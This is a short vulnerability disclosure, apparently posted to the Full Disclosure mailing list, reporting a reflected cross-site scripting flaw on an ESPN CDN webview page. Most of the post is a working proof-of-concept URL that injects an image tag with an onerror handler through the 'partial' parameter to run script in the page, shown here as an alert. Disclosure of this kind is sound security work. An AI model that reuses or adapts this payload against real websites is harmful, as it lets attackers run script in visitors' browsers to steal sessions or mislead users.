ESPN Reflected XSS

[Ismail Doe <ismail.sec.dev () gmail com>]

Document Title:
===============

Reflected XSS on ESPN site


PoC:

===============


1) Navigate to the following URL:


http://cdn.espn.com/core/standalone/webview?partial=%22%3E%3Cimg%20src%3D1%20onerror%3Dalert(1337)%3E%2F%2F&appsrc=sc&lang=en&region=us&platform=ios


2) Note that the form alerts with the payload

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/